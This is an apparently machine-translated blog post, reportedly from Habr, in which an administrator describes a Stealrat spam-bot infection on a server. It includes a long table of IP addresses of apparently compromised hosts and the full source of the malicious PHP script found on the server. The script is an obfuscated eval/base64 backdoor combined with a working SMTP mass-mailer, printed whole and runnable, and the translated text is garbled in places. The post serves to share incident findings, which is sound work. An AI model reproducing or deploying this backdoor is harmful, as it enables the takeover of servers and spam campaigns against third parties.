208.113.129.14312米国米国ブレア
119.59.105.157312Thタイ
213.136.65.234312DEドイツ
91.228.236.4312UAウクライナ
144.76.112.179312DEドイツ
106.186.112.193312JP日本
74.220.219.68312米国米国プロボ
89.184.67.225312UAウクライナキエフ
67.205.47.214312米国米国ブレア
166.78.144.154312米国米国サンアントニオ
162.253.145.150312米国米国
212.97.160.75312ESスペインサラゴサ
77.120.105.130312UAウクライナ
103.23.79.134312SGシンガポール
77.222.40.81312RUロシア連邦
74.50.87.130312米国米国ユニオンシティ
107.21.114.99312米国米国アッシュバーン
148.251.41.70312DEドイツ
86.107.43.53312ROルーマニア
218.213.244.117312Hk香港クワイ・チョン
82.98.162.44312ESスペイン
90.150.149.3312RUロシア連邦
62.77.65.123312Czチェコ共和国
222.124.202.178312IDインドネシアジャカルタ
91.201.52.87312RUロシア連邦
77.222.40.53312RUロシア連邦
194.186.22.174300RUロシア連邦
83.169.19.196300DEドイツ一番
87.247.179.190300IRイラン、イスラム共和国
157.7.184.16300JP日本
62.75.216.86300DEドイツ
64.111.127.191300米国米国ブレア
54.199.128.26300JP日本東京
212.83.148.67300FRフランス
109.72.95.12300Nlオランダ
54.236.216.241300米国米国アッシュバーン
46.4.61.212300DEドイツ
118.69.204.202300Vnベトナム
92.255.196.173300RUロシア連邦カザン
23.89.192.224300米国米国ヘンダーソン
27.254.66.151300Thタイ
85.13.150.116300DEドイツ
81.201.49.9300Czチェコ共和国クラドノ
173.254.28.57300米国米国プロボ
144.76.154.81300DEドイツ
66.115.174.137300米国米国マリエッタ
212.15.115.19300RUロシア連邦モスクワ
89.184.70.31300UAウクライナキエフ
85.25.201.176300DEドイツ
120.138.21.77300Nzニュージーランド
98.142.240.110300CAカナダブランプトン
184.107.154.82300CAカナダモントラル
159.253.144.76300Nlオランダ
109.202.13.114288RUロシア連邦トムスク
178.172.148.221288BYベラルーシ
164.177.151.209288GBイギリス
198.154.248.248288米国米国ヒューストン
75.125.253.18288米国米国ヒューストン
190.153.188.6288CLチリサンティアゴ
78.47.94.128288DEドイツ
54.250.184.233288JP日本東京
183.81.164.218288私のマレーシア
176.9.218.111288DEドイツ
194.27.32.44288TRトルコムーラ
185.4.75.69288ええエストニア
91.212.157.65288FRフランス
217.20.175.14288UAウクライナ
64.90.57.231288米国米国ブレア
148.251.0.23288DEドイツ
50.56.69.73288米国米国サンアントニオ
188.165.229.9288FRフランス
46.252.16.11288DEドイツ
178.63.68.203288DEドイツ
82.98.139.8288ESスペイン
212.67.217.28288GBイギリス
87.118.90.207288DEドイツ
91.239.66.97288PLポーランド
78.46.220.108288DEドイツ
85.13.138.19288DEドイツ
195.62.70.239288RUロシア連邦
95.163.69.102288RUロシア連邦
129.121.177.180288米国米国アルバカーキ
69.28.254.181288CAカナダモントラル
208.113.225.11288米国米国ブレア
202.181.172.147288Hk香港
103.1.186.252288Auオーストラリアマリックビル
81.176.232.174287RUロシア連邦
80.247.79.182276ITイタリア
83.216.181.139276ITイタリアフィオラノモデネーゼ
212.191.32.222276PLポーランドウッチ
194.190.67.126276RUロシア連邦
77.222.40.205276RUロシア連邦
77.222.56.208276RUロシア連邦
198.154.218.101276米国米国ヒューストン
23.253.211.174276米国米国サンアントニオ
198.15.95.74276米国米国テンペ
82.98.169.87276ESスペイン
199.89.53.36276米国米国
89.184.69.2276UAウクライナキエフ
133.242.205.125276JP日本さくら
213.238.166.30276TRトルコ
5.187.1.232276DEドイツフランクフルト
108.171.175.23276米国米国サンアントニオ
203.176.183.45276IDインドネシアボゴール
212.224.118.220276DEドイツ
176.67.240.92276RUロシア連邦ニジニ・ノヴゴロド
65.99.237.20276米国米国セントルイス
178.63.22.196276DEドイツ
77.222.61.185276RUロシア連邦
95.213.136.66276RUロシア連邦
49.50.8.226276IDインドネシア
64.90.42.228276米国米国ブレア
195.204.17.84276いやノルウェーs
162.213.254.82276米国米国ロサンゼルス
62.75.142.113276DEドイツ
173.203.81.168276米国米国サンアントニオ
106.187.93.112276JP日本
195.225.168.238276ITイタリア
173.214.187.101276米国米国エドモンド
70.32.78.142276米国米国カルバーシティ
46.119.10.42276UAウクライナ
129.121.176.183264米国米国アルバカーキ
74.220.207.175264米国米国プロボ
184.107.198.106264CAカナダモントラル
106.51.252.22264インド
117.53.153.171264私のマレーシア
108.168.130.34264米国米国ダラス
77.222.40.26264RUロシア連邦
77.221.130.46264RUロシア連邦
87.106.18.135264DEドイツ
88.80.213.62264DEドイツ一番
68.171.222.84264米国米国サウスフィールド
81.176.226.164264RUロシア連邦
65.99.237.17264米国米国セントルイス
69.195.198.156264米国米国マイアミ
216.194.8.46264米国米国ハリソン
67.205.20.94264米国米国ブレア
77.232.72.80264EUヨーロッパ
208.113.229.16264米国米国ブレア
193.239.4.84264DEドイツ
174.140.212.122264米国米国ラスベガス
77.222.61.113264RUロシア連邦
77.92.143.166264TRトルコサナイ
91.199.197.222264RUロシア連邦
89.31.103.105264Nlオランダ
77.120.106.25264UAウクライナ
5.178.85.12264RUロシア連邦
83.169.19.228264DEドイツ一番
199.116.78.158264米国米国トラバースシティ
91.218.230.119252RUロシア連邦
50.57.86.110252米国米国サンアントニオ
212.72.171.211252DEドイツ
92.61.157.40252EUヨーロッパ
37.59.3.134252FRフランス
88.198.40.196252DEドイツネルンベルク
74.50.2.123252米国米国アナハイム
163.178.101.196252CRコスタリカサンジョス
77.222.40.65252RUロシア連邦
184.173.107.12252米国米国ヒューストン
81.169.131.15252DEドイツベルリン
69.175.78.58252米国米国シカゴ
77.222.40.221252RUロシア連邦
148.251.55.181252DEドイツ
62.75.230.62252DEドイツ
5.250.177.86252GBイギリス
77.221.130.38252RUロシア連邦
142.4.29.17252米国米国プロボ
199.116.78.108252米国米国トラバースシティ
178.208.131.106252RUロシア連邦
95.169.186.78252DEドイツ
77.222.57.40240RUロシア連邦
8.29.131.195240米国米国シンシナティ
95.168.210.61240Czチェコ共和国
188.165.250.82240FRフランス
188.120.241.11240RUロシア連邦モスクワ
5.9.122.105240DEドイツ
192.237.186.143240米国米国サンアントニオ
46.183.250.13240Nlオランダ
77.222.40.44240RUロシア連邦
77.221.130.31240RUロシア連邦
5.9.147.234240DEドイツ
82.146.37.81240RUロシア連邦イルクーツク
95.138.189.116240GBイギリス
89.184.72.80240UAウクライナキエフ
173.0.129.96240米国米国オーランド
98.129.239.249228米国米国サンアントニオ
174.136.12.69228米国米国ダラム
85.214.149.196228DEドイツベルリン
88.208.250.12228GBイギリスグロスター
5.9.150.76228DEドイツ
200.124.138.52228Cwクルカオウィレムスタッド
82.98.144.22228ESスペイン
192.99.16.165228CAカナダモントラル
88.204.108.93228RUロシア連邦トムスク
62.99.220.220228ATオーストリア
203.123.187.186228インド
91.201.52.83228RUロシア連邦
153.122.9.192228JP日本東京
77.87.193.193228UAウクライナ
199.231.93.131228米国米国ナニュエット
212.102.229.234228DEドイツオーバーベルク
193.106.95.104228RUロシア連邦モスクワ
92.61.152.95228EUヨーロッパ
178.218.166.171228人事クロアチア
217.243.238.50228DEドイツ
188.225.36.197228RUロシア連邦
83.169.31.225228DEドイツ一番
144.76.200.117228DEドイツ
176.58.122.8216GBイギリス
195.149.225.171216PLポーランド
31.31.196.47216RUロシア連邦
79.96.190.30216PLポーランド
208.113.153.234216米国米国ブレア
5.79.29.126216GBイギリス
103.11.74.136216IDインドネシア
198.100.45.29216米国米国
9/9 / 169.12204SKスロバキア
82.207.52.82204UAウクライナ
5.63.159.22204RUロシア連邦
46.28.64.150204UAウクライナ
199.116.78.161204米国米国トラバースシティ
195.210.46.110204KZカザフスタン
81.19.186.159204GBイギリス
64.55.119.44204米国米国ランチョコードヴァ
23.252.121.207204米国米国ロサンゼルス
69.41.236.53204米国米国ヒューストン
50.23.81.82204米国米国サンノゼ
46.165.220.147204DEドイツ
77.221.130.17204RUロシア連邦
37.59.10.29192FRフランス
193.17.204.52192DEドイツ
216.120.250.101192米国米国クリフトンパーク
162.209.99.196192米国米国サンアントニオ
77.91.205.166192PTポルトガル
81.25.126.23192ESスペイン
207.58.145.53192米国米国マクリーン
112.78.2.175192Vnベトナム
207.228.63.37192米国米国リノ
195.158.234.59192ROルーマニア
103.244.9.7192SGシンガポール
85.214.144.114192DEドイツベルリン
81.29.203.238192ITイタリア
87.106.135.33192DEドイツ
85.13.143.160180DEドイツ
162.243.40.27180米国米国
82.98.134.212180ESスペイン
66.225.219.33180米国米国シカゴ
46.33.115.219180Czチェコ共和国
66.199.140.243180CAカナダトロント
112.78.6.239180Vnベトナム
213.168.182.122180Czチェコ共和国ムラダ・ボレスラフ
91.142.208.62168ESスペインバルセロナ
68.171.219.98168米国米国サウスフィールド
69.163.180.47168米国米国ブレア
176.9.33.44168DEドイツ
5.9.107.11168DEドイツ
95.76.161.151168ROルーマニアブカレスト
81.177.3.76168RUロシア連邦
77.232.68.46168EUヨーロッパ
37.140.192.17168RUロシア連邦
198.154.104.66168米国米国ダラス
85.13.130.230168DEドイツ
49.50.8.193156IDインドネシア
5.9.141.74156DEドイツ
70.85.33.34156米国米国ヒューストン
46.4.90.51156DEドイツ
151.78.206.227156ITイタリア
77.222.56.22156RUロシア連邦
37.140.192.60144RUロシア連邦
210.211.101.21144Vnベトナムハノイ
88.198.158.190144DEドイツ
198.57.1​​63.213144米国米国プロボ
103.249.108.101144Hk香港
77.222.61.197144RUロシア連邦
85.214.240.160144DEドイツベルリン
174.136.14.109132米国米国ダラム
98.129.249.134132米国米国サンアントニオ
108.168.250.16132米国米国ダラス
64.34.157.180132米国米国ニューヨーク
217.160.168.95132DEドイツ
144.76.131.196132DEドイツ
213.162.246.73132いやノルウェー
162.144.36.171132米国米国プロボ
198.57.205.195132米国米国プロボ
208.113.185.93132米国米国ブレア
194.100.28.115132FIフィンランド
79.99.203.89120BEベルギー
82.98.134.217120ESスペイン
134.0.113.79120RUロシア連邦
173.236.176.122120米国米国ブレア
92.53.126.190120RUロシア連邦
85.13.130.227120DEドイツ
77.221.130.37120RUロシア連邦
64.202.107.85120米国米国シカゴ
212.34.156.23120ESスペイン
184.173.107.20108米国米国ヒューストン
46.161.1.139108RUロシア連邦サンクトペテルブルク
64.5.33.166108米国米国ヒューストン
212.85.116.109108PLポーランド
5.63.159.66108RUロシア連邦
89.184.78.99108UAウクライナキエフ
85.25.78.183108DEドイツ
148.251.47.43108DEドイツ
92.53.126.11896RUロシア連邦
92.53.125.17896RUロシア連邦
92.53.112.20296RUロシア連邦
92.53.125.15896RUロシア連邦
75.126.27.9096米国米国ダラス
77.222.40.18596RUロシア連邦
195.234.4.6096UAウクライナ
78.108.80.1096RUロシア連邦
79.96.54.19096PLポーランド
77.75.35.14096TRトルコ
85.13.150.6696DEドイツ
93.93.64.20684ESスペイン
37.140.192.16884RUロシア連邦
92.53.126.16484RUロシア連邦
108.168.250.1372米国米国ダラス
108.168.250.972米国米国ダラス
81.177.140.17172RUロシア連邦
92.53.113.3672RUロシア連邦
70.33.246.3072CAカナダオークビル
188.93.144.8672Nlオランダ
70.33.246.4072CAカナダオークビル
81.176.228.272RUロシア連邦
77.222.42.17660RUロシア連邦
92.53.114.5960RUロシア連邦
199.116.78.560米国米国トラバースシティ
216.119.155.24660米国米国アトランタ
176.57.209.9260RUロシア連邦
89.161.215.6060PLポーランド
108.168.219.17360米国米国ダラス
99.198.109.20260米国米国シカゴ
92.53.126.19360RUロシア連邦
2.81.128.21648PTポルトガルゲダ
176.57.210.3248RUロシア連邦
85.13.139.12548DEドイツ
92.53.98.15648RUロシア連邦
85.214.149.3848DEドイツベルリン
74.124.195.4548米国米国ロサンゼルス
81.177.139.5148RUロシア連邦
92.53.112.19448RUロシア連邦
198.178.116.24148CAカナダ
192.249.114.3248米国米国ロサンゼルス
92.53.126.7248RUロシア連邦
92.53.112.2148RUロシア連邦
173.254.28.6148米国米国プロボ
92.53.125.3048RUロシア連邦
81.176.66.24448RUロシア連邦
65.99.239.22748米国米国セントルイス
37.140.192.5648RUロシア連邦
37.140.192.8748RUロシア連邦
190.107.17.6636COコロンビアペレイラ
92.53.114.24536RUロシア連邦
37.140.192.7136RUロシア連邦
37.140.192.22636RUロシア連邦
81.177.141.10136RUロシア連邦
37.140.192.12636RUロシア連邦
37.140.192.3236RUロシア連邦
81.177.6.636RUロシア連邦
205.234.140.23136米国米国シカゴ
81.177.141.3236RUロシア連邦
92.53.118.2736RUロシア連邦
37.140.192.6336RUロシア連邦
92.53.125.19636RUロシア連邦
168.144.144.3636CAカナダトロント
69.175.71.5036米国米国シカゴ
79.96.147.10036PLポーランド
195.210.29.1136SKスロバキア
91.197.230.1236GBイギリス
92.53.113.21636RUロシア連邦
81.177.139.18136RUロシア連邦
184.173.107.1736米国米国ヒューストン
212.113.145.19536GBイギリス
184.173.107.836米国米国ヒューストン
31.31.196.3536RUロシア連邦
92.38.226.1436RUロシア連邦
92.53.98.19136RUロシア連邦
92.53.118.14036RUロシア連邦
207.58.154.2724米国米国レストン
77.222.61.16024RUロシア連邦
192.185.82.24724米国米国ヒューストン
46.4.126.10624DEドイツ
81.177.141.17124RUロシア連邦
178.254.9.6524DEドイツ
92.53.114.324RUロシア連邦
217.107.34.9124RUロシア連邦
37.140.192.12824RUロシア連邦
176.57.209.18024RUロシア連邦
92.53.96.16124RUロシア連邦
31.31.196.3924RUロシア連邦
176.9.7.14924DEドイツ
79.170.44.10624GBイギリス
81.177.141.20124RUロシア連邦
81.177.141.16124RUロシア連邦
37.140.192.10624RUロシア連邦
81.177.6.7224RUロシア連邦
81.177.141.22124RUロシア連邦
81.177.135.15124RUロシア連邦
176.57.210.3524RUロシア連邦
176.57.216.224RUロシア連邦
184.154.233.224米国米国シカゴ
37.140.192.3624RUロシア連邦
76.74.242.20024米国米国ニューヨーク
91.197.228.15024GBイギリス
92.53.121.5624RUロシア連邦
81.177.140.7124RUロシア連邦
184.173.107.424米国米国ヒューストン
176.57.216.9024RUロシア連邦
198.57.247.20224米国米国プロボ
192.185.176.22524米国米国ヒューストン
176.57.209.6924RUロシア連邦
37.140.192.11024RUロシア連邦
50.87.144.4724米国米国プロボ
92.53.112.8224RUロシア連邦
92.53.98.15824RUロシア連邦
81.95.96.17824Czチェコ共和国プラハ
69.90.162.10024CAカナダオークビル
37.140.192.20224RUロシア連邦
37.140.192.924RUロシア連邦
69.25.136.25224米国米国アトランタ
37.140.192.8024RUロシア連邦
92.53.96.22024RUロシア連邦
185.21.133.10124GBイギリス
92.53.126.2212RUロシア連邦
72.47.209.12712米国米国カルバーシティ
81.177.139.2112RUロシア連邦
92.53.118.11712RUロシア連邦
192.185.83.11012米国米国ヒューストン
64.188.46.13612米国米国シカゴ
92.53.96.4912RUロシア連邦
67.227.167.6812米国米国ランシング
92.53.121.6812RUロシア連邦
50.87.144.18912米国米国プロボ
50.87.144.3812米国米国プロボ
91.197.231.17512GBイギリス
81.177.140.1112RUロシア連邦
92.127.158.2712RUロシア連邦
79.96.63.3812PLポーランド
212.85.108.20512PLポーランド
92.53.96.8912RUロシア連邦
81.177.140.12112RUロシア連邦
89.161.164.19412PLポーランド
192.185.83.22712米国米国ヒューストン
81.177.139.21112RUロシア連邦
188.93.212.4412RUロシア連邦
37.140.192.1312RUロシア連邦
92.53.96.2912RUロシア連邦
176.57.209.13712RUロシア連邦
217.107.34.4112RUロシア連邦
176.57.209.4812RUロシア連邦
92.53.125.5412RUロシア連邦
92.53.125.20812RUロシア連邦
92.53.96.4712RUロシア連邦
195.234.4.5012UAウクライナ
92.53.125.9012RUロシア連邦
81.177.140.6412RUロシア連邦
92.53.114.8512RUロシア連邦
91.106.203.8512RUロシア連邦
176.57.210.412RUロシア連邦
81.177.141.19112RUロシア連邦
192.185.83.16212米国米国ヒューストン
81.177.139.11112RUロシア連邦
81.177.141.21112RUロシア連邦
91.218.228.15412RUロシア連邦
70.33.241.14012米国米国ニューヨーク
192.185.2.22112米国米国ヒューストン
193.183.99.17112ITイタリアミラノ
80.172.241.4412PTポルトガル
37.140.192.23812RUロシア連邦
208.38.186.10012米国米国ネーパービル
198.57.247.18212米国米国プロボ
81.177.140.22112RUロシア連邦
92.53.114.12312RUロシア連邦
213.183.63.312RUロシア連邦モスクワ
85.89.105.3012RUロシア連邦
81.177.139.1112RUロシア連邦
192.163.206.14212米国米国プロボ
192.185.4.5912米国米国杉林
81.177.135.12112RUロシア連邦
85.158.183.14112DEドイツ
92.38.226.1312RUロシア連邦
92.53.96.24012RUロシア連邦
217.107.219.19112RUロシア連邦
173.255.225.1306米国米国カレッジステーション
IPヒット数国コード国名市区町村


国別のドーナツとヒット数


悪意のあるスクリプトのソースコード(PHPコードは作成されますが、変数と関数の名前は変更されません)
<?php eval(base64_decode($_POST['n8743bb']));?> <?php @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL); @ini_set('log_errors',0); if(count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $SomeGlobalVar = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $SomeGlobalVar = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($SomeGlobalVar) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) != false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 = count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; } for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 = $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; $v1e66f6b4 = 'ma'.chr(105).'l'; if (!in_array('m'.'a'.'il', $v619d75f8)) { if ($v10497e3f) { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } else { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } } $v4340fd73 = "Date: " . @date("D, j MYG:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { echo(chr(79).chr(75).md5(1234567890)."+1\n"); continue; } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417\n"; } } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?> 


IPアドレスのリスト、おそらくこのリストにあるサーバーのIPを見てください。 その場合は、自分で問題を特定してください。 定期的に共有ホスティングを利用している場合は、隣人がStealratという名前でこのような感染を起こしていることをホスティング業者に書きます。 次に何をすべきかわかりません。問題はローカライズされており、穴はすべて閉じられていますが、リクエストは常に寄せられています。 一意のIPのリストが補充および補充されます。 サーバーに負荷はありませんが、何が起こっているのか、そしてそのような量の知識しかありません...誰がそれを書くべきか、そしてIPデータのすべての所有者に警告する方法を知っています。 たぶんあなたの一人が教えてくれます。

私たちはtrendmicroにこのIPアドレスのリストをどうするかを尋ねる手紙を書きました。 おそらく彼らは促し、おそらくそうではないでしょう。 おそらく、感染したIPなどを追加できるサービスがあります。

幸運を祈ります。サーバーの世話をしてください。

更新1.すべての感染サイトをログから選択(スパムメッセージの本文から)
プレートでは、サーバーのドメインとIP。 リストはドメインごとに一意です。
リスト(4705)

更新2.ドメインの追加選択(ホスト名)
プレートでは、サーバーのドメインとIP。 リストはドメインごとに一意です。
リストを提供してくれたユーザーxaker1に感謝します。
リスト(1223)

Source: https://habr.com/ru/post/J221871/


All Articles